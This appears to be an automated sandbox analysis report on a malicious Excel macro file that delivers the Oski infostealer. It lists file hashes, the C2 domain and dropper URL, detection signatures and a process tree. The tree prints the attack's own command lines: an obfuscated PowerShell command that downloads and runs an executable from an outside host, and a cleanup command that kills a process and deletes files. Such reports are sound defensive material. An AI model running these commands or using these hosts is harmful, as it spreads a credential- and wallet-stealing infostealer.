Analysis

  • max time kernel
    101s
  • max time network
    100s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    05/08/2021, 18:27

General

  • Target

    fileattached.xlsm

  • Size

    12KB

  • MD5

    2d827df1ee25674aac2060c37efa2fe7

  • SHA1

    c3c6a82ee16f87ebacdd8be47018be38b6c98a27

  • SHA256

    436651743894169dc9cd4c7ef01734420a5ce2d6dcaf57825197e0c756feeee9

  • SHA512

    93258ac910bcad2633dfaa947edf88b3cfea5bb625b071e005fc7ba117e1307a77a6ddc5a8a7ab14a3cea646d8743dc60e5cdc0271ee8eb467faf2a06d739d66

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    exe.dropper
    http://iurl.vip/bij0o

Extracted

  • Family
    oski
  • C2
    notedemo.axfree.com

Signatures

  • Oski

    Oski is an infostealer targeting browser data and cryptocurrency wallets.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fileattached.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\zJAMC.exe
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Users\Admin\AppData\Local\Temp\zJAMC.exe
          "C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1000
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            5⤵
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1976 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\863405627395110\\* & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1852
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /pid 1976
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1836
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/bij0o',$env:Temp+'\zJAMC.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:816

Network

        Downloads